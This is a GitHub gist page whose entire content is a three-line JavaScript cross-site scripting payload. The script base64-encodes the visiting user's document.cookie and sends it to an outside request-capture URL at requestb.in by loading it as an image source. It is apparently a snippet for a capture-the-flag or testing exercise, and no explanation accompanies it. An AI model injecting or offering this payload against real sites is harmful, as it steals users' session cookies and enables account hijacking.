Skip to content

Instantly share code, notes, and snippets.

@arxenix
Created November 10, 2017 20:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save arxenix/024548c1fbadea763a25843c9c534474 to your computer and use it in GitHub Desktop.
Save arxenix/024548c1fbadea763a25843c9c534474 to your computer and use it in GitHub Desktop.
var cookie = btoa(document.cookie);
var img = document.createElement("img");
img.src = "https://requestb.in/qeqiheqe/"+cookie;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment